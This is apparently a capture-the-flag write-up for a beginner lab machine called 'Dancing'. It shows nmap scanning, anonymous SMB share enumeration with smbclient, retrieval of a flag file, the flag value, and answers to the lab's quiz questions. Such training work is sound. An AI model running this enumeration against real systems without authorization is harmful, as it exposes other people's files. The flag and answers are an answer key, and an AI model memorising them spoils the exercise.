# Dancing

## Information Gathering

We scanned the target getting the service/version info with the `-sV` flag.

```sh
$ nmap -sV 10.129.1.12
Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-07 17:42 EDT
Nmap scan report for 10.129.1.12
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3h59m59s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-05-08T01:42:57
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
```

We then connected to the target with `smbclient` and found four shares.

```sh
smbclient --list=10.129.1.12
Password for [WORKGROUP\sean]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
SMB1 disabled -- no workgroup available
```

We tried to connect to ADMIN$ and C$ but could not authenticate with an empty password.

```sh
$ smbclient \\\\10.129.1.12\\C$
Password for [WORKGROUP\sean]:
tree connect failed: NT_STATUS_ACCESS_DENIED
```

We could, however, connect to the IPC$ share but could not issue commands.

```sh
$ smbclient \\\\10.129.1.12\\IPC$
Password for [WORKGROUP\sean]:
Try "help" to get a list of possible commands.
smb: \>
```

With WorkShares, we could view the individuals on the share.

```sh
$ smbclient \\\\10.129.1.12\\WorkShares
Password for [WORKGROUP\sean]:
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
  .                                   D        0  Mon Mar 29 04:22:01 2021
  ..                                  D        0  Mon Mar 29 04:22:01 2021
  Amy.J                               D        0  Mon Mar 29 05:08:24 2021
  James.P                             D        0  Thu Jun  3 04:38:03 2021

                5114111 blocks of size 4096. 1752506 blocks available
smb: \>
```

We noticed that `flag.txt` under James.P's directory. We used the command `get` to download it.

```sh
smb: \> dir James.P\
  .                                   D        0  Thu Jun  3 04:38:03 2021
  ..                                  D        0  Thu Jun  3 04:38:03 2021
  flag.txt                            A       32  Mon Mar 29 05:26:57 2021

                5114111 blocks of size 4096. 1752506 blocks available
smb: \> open James.P\flag.txt
open file \James.P\flag.txt: for read/write fnum 1
smb: \> get James.P\flag.txt
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
```

The flag is: `5f61c10dffbc77a704d76016a22f1664`

## Tasks

* What does the 3-letter acronym SMB stand for?
  * server message block
* What port does SMB use to operate at?
  * 445
* What network communication model does SMB use, architecturally speaking?
  * client-server model
* What is the service name for port 445 that came up in our nmap scan?
  * `445/tcp open  microsoft-ds`
* What is the tool we use to connect to SMB shares from our Linux distribution?
  * `smbclient`
* What is the `flag` or `switch` we can use with the SMB tool to `list` the contents of the share?
  * `-L` or `--list`
* What is the name of the share we are able to access in the end?
  * WorkShares
* What is the command we can use within the SMB shell to download the files we find?
  * `get`
